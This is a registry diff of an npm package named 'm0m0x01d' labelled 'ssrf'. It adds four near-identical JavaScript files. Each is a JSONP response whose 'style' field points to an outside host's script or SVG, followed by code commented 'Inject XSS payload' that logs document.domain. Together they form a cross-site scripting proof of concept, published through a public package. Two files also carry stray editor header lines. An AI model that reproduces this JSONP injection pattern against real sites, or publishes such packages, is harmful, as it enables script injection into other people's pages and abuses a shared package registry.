m0m0x01d 28.0.0 → 30.0.0

Sign up to get free protection for your applications and to get access to all the features.
package/media3.js ADDED
@@ -0,0 +1,13 @@
1
+ GNU nano 6.2 media2.js
2
+ /*jsonp*/
3
+ s7sdkJSONResponse({
4
+ "style": "https://brutelogic.com.br/1.js",
5
+ "type": "MixedMediaHTML5Mobile",
6
+ "vt": "MediaSetVirtual"
7
+ }, "192959476");
8
+
9
+ // Inject XSS payload after the JSONP function
10
+ (function() {
11
+ var xss_payload = document.domain;
12
+ console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
13
+ })();
package/media4.js ADDED
@@ -0,0 +1,13 @@
1
+ GNU nano 6.2 media2.js
2
+ /*jsonp*/
3
+ s7sdkJSONResponse({
4
+ "style": "https://brutelogic.com.br/poc.svg",
5
+ "type": "MixedMediaHTML5Mobile",
6
+ "vt": "MediaSetVirtual"
7
+ }, "192959476");
8
+
9
+ // Inject XSS payload after the JSONP function
10
+ (function() {
11
+ var xss_payload = document.domain;
12
+ console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
13
+ })();
package/media5.js ADDED
@@ -0,0 +1,13 @@
1
+ /*jsonp*/
2
+ s7sdkJSONResponse({
3
+ "style": "https://brutelogic.com.br/1.js",
4
+ "type": "MixedMediaHTML5Mobile",
5
+ "vt": "MediaSetVirtual"
6
+ }, "192959476");
7
+
8
+ // Inject XSS payload after the JSONP function
9
+ (function() {
10
+ var xss_payload = document.domain;
11
+ console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
12
+ })();
13
+
package/media6.js ADDED
@@ -0,0 +1,13 @@
1
+ /*jsonp*/
2
+ s7sdkJSONResponse({
3
+ "style": "https://brutelogic.com.br/poc.svg",
4
+ "type": "MixedMediaHTML5Mobile",
5
+ "vt": "MediaSetVirtual"
6
+ }, "192959476");
7
+
8
+ // Inject XSS payload after the JSONP function
9
+ (function() {
10
+ var xss_payload = document.domain;
11
+ console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
12
+ })();
13
+
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "28.0.0",
3
+ "version": "30.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {